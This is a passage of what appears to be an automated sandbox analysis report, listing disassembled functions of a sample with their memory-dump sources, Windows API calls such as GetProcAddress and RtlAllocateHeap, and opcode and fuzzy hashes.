                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 7b4ea4b58db5d518e1628a7905ec2734f0b551fd4ae2aa445d6a33203102b3d4
                                                                                                                    • Instruction ID: 0fdb5751193aa293418500f3d842c7b2cab04d2c2218ed0d1a51c66a6928a2a9
                                                                                                                    • Opcode Fuzzy Hash: 7b4ea4b58db5d518e1628a7905ec2734f0b551fd4ae2aa445d6a33203102b3d4
                                                                                                                    • Instruction Fuzzy Hash: AF4124B0905B409AE724DF798885AE7FAE5BF19310F50493ED5FE83282CB356654CB14
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005B098
                                                                                                                      • Part of subcall function 000413DC: __EH_prolog.LIBCMT ref: 000413E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 372611c31f42078c11c965b1bff2e6728d178558148f4b90b537b2d28668c168
                                                                                                                    • Instruction ID: e745c311d9b55c99bb192b369323cc48d96145f2383e7ad431698b77f4138e88
                                                                                                                    • Opcode Fuzzy Hash: 372611c31f42078c11c965b1bff2e6728d178558148f4b90b537b2d28668c168
                                                                                                                    • Instruction Fuzzy Hash: AE317CB1C00249AACF15DF64C8519EFBBB4AF09300F5044AEE809B7242DB35AF08CBA5
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0006ACF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 18303b0dbd207dff11fa296e32ab448a5bf6aebf50849b3bf3839911bfcf67c3
                                                                                                                    • Instruction ID: fab295fe0eddeada90d7127d70754871dce9b81e9b1b44bc439c87245802e088
                                                                                                                    • Opcode Fuzzy Hash: 18303b0dbd207dff11fa296e32ab448a5bf6aebf50849b3bf3839911bfcf67c3
                                                                                                                    • Instruction Fuzzy Hash: C911E733B016255FEB25AE2CDC4099E73D7AF863307168120ED1ABB254D634EC41CBD2
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0004CE45
                                                                                                                      • Part of subcall function 00045E37: __EH_prolog.LIBCMT ref: 00045E3C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: eec8906e0fbbb052056931e1f6ca843c5fcb1e7004fce4a70b9bea6171fad709
                                                                                                                    • Instruction ID: 6d33858b9edcb6ef0e0c78e03e2f3c79cfcfd29254b240ca4113504911081ce1
                                                                                                                    • Opcode Fuzzy Hash: eec8906e0fbbb052056931e1f6ca843c5fcb1e7004fce4a70b9bea6171fad709
                                                                                                                    • Instruction Fuzzy Hash: 411151B1A01284DAEB14DB79C545BEEB7E8DF45301F14446DA44693283DB745B04C766
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 02f57a2b8030d08a1d7bfa0f611a2308fa5b7bfefcfec0394d9be87b454b9bde
                                                                                                                    • Instruction ID: 33abffe9eac5ab2d7a03787da710a8208d06815bbc485400285533fad861f78b
                                                                                                                    • Opcode Fuzzy Hash: 02f57a2b8030d08a1d7bfa0f611a2308fa5b7bfefcfec0394d9be87b454b9bde
                                                                                                                    • Instruction Fuzzy Hash: 31018EB3900528BBCF12AFA8CD819DFB771BF88750B014235E816B7223DA749D0486A8
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0006B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006B177
                                                                                                                    • _free.LIBCMT ref: 0006C4E5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction ID: ccb27eafbce8a3d12649e8a47cdd546b84de49c99060b4cfbe3c0e7c9055e9aa
                                                                                                                    • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                    • Instruction Fuzzy Hash: 0101D6722003056BE331DF659895DAAFBEEFB89370F25062DE5D493282EA30A905C774
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00069813,00000001,00000364,?,00063F73,00000050,?,00081030,00000200), ref: 0006B177
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: c8ca2a64ca2f882e84558cfcbee2d400f210445bcd9bd8bbb0694126131a1b67
                                                                                                                    • Instruction ID: 438c85bdf7885bf1dc9d2204440308fa0130a860a71ad43eee584d3472a05903
                                                                                                                    • Opcode Fuzzy Hash: c8ca2a64ca2f882e84558cfcbee2d400f210445bcd9bd8bbb0694126131a1b67
                                                                                                                    • Instruction Fuzzy Hash: B3F0E97250512477EB715A21AC29B9F37CBAF83770B598221FC08EF191DB30DD8282E0
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00063C3F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: 6d089270c90b4669b1184eedb3b3dfa16cb0e6b9d00d456f55957b4e409dd7f3
                                                                                                                    • Instruction ID: 9d20755935496189dc910e2360ac9d9289549f45dc6ca75cf4ca49466e39e407
                                                                                                                    • Opcode Fuzzy Hash: 6d089270c90b4669b1184eedb3b3dfa16cb0e6b9d00d456f55957b4e409dd7f3
                                                                                                                    • Instruction Fuzzy Hash: D7F0E5322002169FDF118EACEC10A9A77EAFF41B307104124FA05E7191DB31EA30D7D0
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006CA2C,00000000,?,00066CBE,?,00000008,?,000691E0,?,?,?), ref: 00068E38
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 02db692237aef36e35702e5a7a171f7bd3fd5d3265d7ab3e8eb69f75183f3475
                                                                                                                    • Instruction ID: fefef7670995983cb857b4585d2be99b4f89bf4d28a64b3902682082cfcd8122
                                                                                                                    • Opcode Fuzzy Hash: 02db692237aef36e35702e5a7a171f7bd3fd5d3265d7ab3e8eb69f75183f3475
                                                                                                                    • Instruction Fuzzy Hash: 24E0653160611557E6B12A659C05B9F76CF9B427B4F158321AC5896192CF67CD0183E1
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00045AC2
                                                                                                                      • Part of subcall function 0004B505: __EH_prolog.LIBCMT ref: 0004B50A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 3b892c91e49cc2c71b65a73fa724dfa33dea1fe4392647020cca8433ca7ee44f
                                                                                                                    • Instruction ID: aef61d62904062a5525448983838f9c0649605d2ad4b4cc3033c429357a6d0a7
                                                                                                                    • Opcode Fuzzy Hash: 3b892c91e49cc2c71b65a73fa724dfa33dea1fe4392647020cca8433ca7ee44f
                                                                                                                    • Instruction Fuzzy Hash: 2B018C308106D4DAD725E7B8C2417DEFBA4DF64306F50888DA85A53283CBB42B08D7A3
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0004A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6C4
                                                                                                                      • Part of subcall function 0004A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6F2
                                                                                                                      • Part of subcall function 0004A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6FE
                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004A598
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464966427-0
                                                                                                                    • Opcode ID: 7d1bfac335ac60b9489aae1bcdfab34eb9d857b42f525473eeffa5aafb8a6a91
                                                                                                                    • Instruction ID: 2f637d3786d9145065ffb9f92283bd2515abe822c0836e5395c920e9828566dd
                                                                                                                    • Opcode Fuzzy Hash: 7d1bfac335ac60b9489aae1bcdfab34eb9d857b42f525473eeffa5aafb8a6a91
                                                                                                                    • Instruction Fuzzy Hash: 1BF0E2B1048780AACB6267B88A00BCB7BD06F2B331F048A4DF1FD12097C2B55094AB27
                                                                                                                    APIs
                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00050E3D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: 580467ea577aacc3b57308b295682e858c9f788fcd4fbfff81247eaa40f8a65c
                                                                                                                    • Instruction ID: bf3386c97625dd1b9701c9e90653dac076b0e66fcd6a452f05f00856ef18af48
                                                                                                                    • Opcode Fuzzy Hash: 580467ea577aacc3b57308b295682e858c9f788fcd4fbfff81247eaa40f8a65c
                                                                                                                    • Instruction Fuzzy Hash: A3D0C230A0105416FA11332868567FF294A8FC7312F0D0025B8895B283EA8D08CAA2A2
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0005A62C
                                                                                                                      • Part of subcall function 0005A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1693329392.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693363278.0000000000073000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.000000000007E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693380070.00000000000A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1693419249.00000000000B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: e282285053d7e29f30700bd0ba8d0660d62736d6321da623e048d237932f3c1f
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: 4FD0C77131020D76DF456B61CC169AF7595EB05345F048225BC41D5152EAB1DA189563
